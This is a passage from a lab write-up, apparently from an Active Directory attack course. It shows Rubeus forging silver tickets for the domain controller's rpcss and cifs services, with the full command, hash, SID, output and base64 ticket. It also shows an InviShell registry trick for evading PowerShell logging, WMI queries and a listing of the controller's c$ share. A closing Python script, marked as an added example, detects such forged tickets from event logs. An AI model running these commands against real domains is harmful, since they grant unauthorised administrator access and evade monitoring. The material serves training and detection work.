[+] URL/PATH : C:\AD\Tools\Rubeus.exe Arguments : evasive-silver /service:rpcss/dcorp-dc.dollarcorp.moneycorp.local /rc4:4855e21503a77d55411cb38f183cb60e /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt
[*] Action: Build TGS
[*] Trying to query LDAP using LDAPS for user information on domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(samaccountname=Administrator)'
[*] Retrieving group and domain policy information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(|(distinguishedname=CN=Group Policy Creator Owners,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Administrators,CN=Builtin,DC=dollarcorp,DC=moneycorp,DC=local)(objectsid=S-1-5-21-719815819-3726368948-3917688648-513)(name={31B2F340-016D-11D2-945F-00C04FB984F9}))'
[*] Attempting to mount: \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL error code ERROR_ACCESS_DENIED (5)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Attempting to mount: \\us.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\us.dollarcorp.moneycorp.local\SYSVOL error code ERROR_BAD_NET_NAME (67)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Retrieving netbios name information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'CN=Configuration,DC=moneycorp,DC=local' for '(&(netbiosname=*)(dnsroot=dollarcorp.moneycorp.local))'
[*] Retrieving group and domain policy information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(|(distinguishedname=CN=Group Policy Creator Owners,CN=Users,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Domain Admins,CN=Users,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Administrators,CN=Builtin,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(objectsid=S-1-5-21-1028785420-4100948154-1806204659-513)(name={31B2F340-016D-11D2-945F-00C04FB984F9}))'
[*] Attempting to mount: \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL error code ERROR_ACCESS_DENIED (5)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Attempting to mount: \\us.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\us.dollarcorp.moneycorp.local\SYSVOL error code ERROR_BAD_NET_NAME (67)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and PasswordMustChange PAC fields.
[*] Retrieving netbios name information over LDAP from domain controller dcorp-dc.dollarcorp.moneycorp.local
[*] Searching path 'CN=Configuration,DC=moneycorp,DC=local' for '(&(netbiosname=*)(dnsroot=dollarcorp.moneycorp.local))'
[*] Building PAC
[*] Domain : DOLLARCORP.MONEYCORP.LOCAL (dcorp)
[*] SID : S-1-5-21-719815819-3726368948-3917688648
[*] UserId : 500
[*] Groups : 544,512,520,513
[*] ServiceKey : 4855E21503A77D55411CB38F183CB60E
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_MD5
[*] KDCKey : 4855E21503A77D55411CB38F183CB60E
[*] KDCKeyType : KERB_CHECKSUM_HMAC_MD5
[*] Service : rpcss
[*] Target : dcorp-dc.dollarcorp.moneycorp.local
[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGS for 'Administrator' to 'rpcss/dcorp-dc.dollarcorp.moneycorp.local'
[*] AuthTime : 10/23/2025 5:58:42 AM
[*] StartTime : 10/23/2025 5:58:42 AM
[*] EndTime : 10/23/2025 3:58:42 PM
[*] RenewTill : 10/30/2025 5:58:42 AM
[*] base64(ticket.kirbi):
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
Y29ycC5tb25leWNvcnAubG9jYWw=
[+] Ticket successfully imported!
c:\Users\student98>klist
Current LogonId is 0:0x14e3f3c4
Cached Tickets: (2)
#0> Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL
Server: rpcss/dcorp-dc.dollarcorp.moneycorp.local @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
Start Time: 10/23/2025 5:58:42 (local)
End Time: 10/23/2025 15:58:42 (local)
Renew Time: 10/30/2025 5:58:42 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0
Kdc Called:
#1> Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL
Server: host/dcorp-dc.dollarcorp.moneycorp.local @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
Start Time: 10/23/2025 5:58:07 (local)
End Time: 10/23/2025 15:58:07 (local)
Renew Time: 10/30/2025 5:58:07 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0
Kdc Called:
c:\Users\student98>
Let’s try to use WMI commands on the domain controller:
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
Get-WmiObject -Class win32_operatingsystem -ComputerName dcorp-dc
c:\Users\student98>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
c:\Users\student98>set COR_ENABLE_PROFILING=1
c:\Users\student98>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}
c:\Users\student98>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}" /f
The operation completed successfully.
c:\Users\student98>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}\InprocServer32" /f
The operation completed successfully.
c:\Users\student98>REG ADD "HKCU\Software\Classes\CLSID\{cf0d821e-299b-5307-a3d8-b283c03916db}\InprocServer32" /ve /t REG_SZ /d "C:\AD\Tools\InviShell\InShellProf.dll" /f
The operation completed successfully.
c:\Users\student98>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Users\student98> Get-WmiObject -Class win32_operatingsystem -ComputerName dcorp-dc
SystemDirectory : C:\Windows\system32
Organization :
BuildNumber : 20348
RegisteredUser : Windows User
SerialNumber : 00454-30000-00000-AA745
Version : 10.0.20348
PS C:\Users\student98>
Silver ticket for CIFS for accessing the filesystem (same command as before, with the cifs service):
C:\Users\student98>C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-silver /service:cifs/dcorp-dc.dollarcorp.moneycorp.local /rc4:4855e21503a77d55411cb38f183cb60e /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt
c:\Users\student98>klist
Current LogonId is 0:0x15a4ce2a
Cached Tickets: (1)
#0> Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL
Server: cifs/dcorp-dc.dollarcorp.moneycorp.local @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
Start Time: 10/24/2025 2:53:53 (local)
End Time: 10/24/2025 12:53:53 (local)
Renew Time: 10/31/2025 2:53:53 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0
Kdc Called:
c:\Users\student98>dir \\dcorp-dc.dollarcorp.moneycorp.local\c$
Volume in drive \\dcorp-dc.dollarcorp.moneycorp.local\c$ has no label.
Volume Serial Number is 1A5A-FDE2
Directory of \\dcorp-dc.dollarcorp.moneycorp.local\c$
01/16/2025 09:48 AM <DIR> Azure ATP Sensor Setup
11/17/2024 01:19 AM 36,392 Microsoft.Tri.Sensor.Deployment.Deployer.exe
05/08/2021 01:20 AM <DIR> PerfLogs
01/16/2025 09:49 AM <DIR> Program Files
05/08/2021 02:40 AM <DIR> Program Files (x86)
04/01/2025 08:44 AM <DIR> Users
01/06/2025 12:40 AM <DIR> Windows
1 File(s) 36,392 bytes
6 Dir(s) 9,498,357,760 bytes free
c:\Users\student98>
As we can see from the previous task, the XXXX service can be used for winrs or PowerShell Remoting.
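The common property of every access above (winrs, WMI, dir on c$) is that the KDC was never involved: Rubeus built and signed the TGS locally with the machine account's key, so the domain controller logs the resulting network logon (event 4624, Kerberos, logon type 3) but no TGS request (event 4769) ever precedes it for that user and service host. The following Python script is an added example, not part of the writeup: it correlates constructed 4624 and 4769 event records (field names as in the Windows Security log; the values are made up to mirror the lab) and reports Kerberos logons for which no ticket was issued within the usual service ticket lifetime.

```python
"""
Correlating DC logon events with TGS requests to spot service tickets that the
KDC never issued. Added example, not part of the lab writeup; the events are
constructed dicts that mimic the fields of Windows Security events 4769 and 4624.
"""
from datetime import datetime, timedelta

# Constructed sample: one normal session (TGS request, then logon) and one
# logon by "Administrator" on the DC with no 4769 anywhere before it, which is
# what pass-the-ticket of a forged (silver) service ticket looks like.
SAMPLE_EVENTS = [
    {"EventID": 4769, "Time": "2025-10-23T05:30:00",
     "TargetUserName": "student98@DOLLARCORP.MONEYCORP.LOCAL",
     "ServiceName": "DCORP-DC$", "TicketEncryptionType": "0x12", "Status": "0x0"},
    {"EventID": 4624, "Time": "2025-10-23T05:31:00",
     "Computer": "dcorp-dc.dollarcorp.moneycorp.local", "TargetUserName": "student98",
     "LogonType": "3", "AuthenticationPackageName": "Kerberos", "IpAddress": "172.16.100.98"},
    {"EventID": 4624, "Time": "2025-10-23T05:45:00",
     "Computer": "dcorp-dc.dollarcorp.moneycorp.local", "TargetUserName": "Administrator",
     "LogonType": "3", "AuthenticationPackageName": "Kerberos", "IpAddress": "172.16.100.98"},
    # NTLM network logons are out of scope for this check and must not alert.
    {"EventID": 4624, "Time": "2025-10-23T05:50:00",
     "Computer": "dcorp-dc.dollarcorp.moneycorp.local", "TargetUserName": "svcadmin",
     "LogonType": "3", "AuthenticationPackageName": "NTLM", "IpAddress": "172.16.100.98"},
]


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S")


def index_tgs_requests(events):
    """Map (user, service host) -> sorted times of successful 4769 events."""
    idx = {}
    for e in events:
        if e["EventID"] != 4769 or e.get("Status") != "0x0":
            continue
        user = e["TargetUserName"].split("@", 1)[0].lower()
        host = e["ServiceName"].rstrip("$").lower()  # DCORP-DC$ -> dcorp-dc
        idx.setdefault((user, host), []).append(_ts(e["Time"]))
    for times in idx.values():
        times.sort()
    return idx


def unrequested_kerberos_logons(events, max_ticket_age=timedelta(hours=10)):
    """Return 4624 Kerberos network logons with no 4769 for the same user and
    host in the preceding max_ticket_age (default: the usual service ticket
    lifetime, which is also the EndTime - StartTime Rubeus printed above)."""
    idx = index_tgs_requests(events)
    alerts = []
    for e in events:
        if e["EventID"] != 4624:
            continue
        if e["LogonType"] != "3" or e["AuthenticationPackageName"] != "Kerberos":
            continue
        when = _ts(e["Time"])
        user = e["TargetUserName"].lower()
        host = e["Computer"].split(".", 1)[0].lower()  # FQDN -> short host name
        issued = idx.get((user, host), [])
        if not any(when - max_ticket_age <= t <= when for t in issued):
            alerts.append({"time": e["Time"], "user": user, "host": host,
                           "source_ip": e["IpAddress"]})
    return alerts


if __name__ == "__main__":
    for a in unrequested_kerberos_logons(SAMPLE_EVENTS):
        print(f"[!] {a['time']} Kerberos logon of {a['user']} on {a['host']} "
              f"from {a['source_ip']} with no matching TGS request (4769)")
```

Two caveats when running this over real logs: 4769 is written on whichever domain controller issued the ticket, so the index has to be built from all DCs' logs (in the lab the target is the only DC, which makes the gap obvious), and renewed or long-lived tickets need a larger window than the 10-hour default, otherwise legitimate logons late in a ticket's life will also be reported.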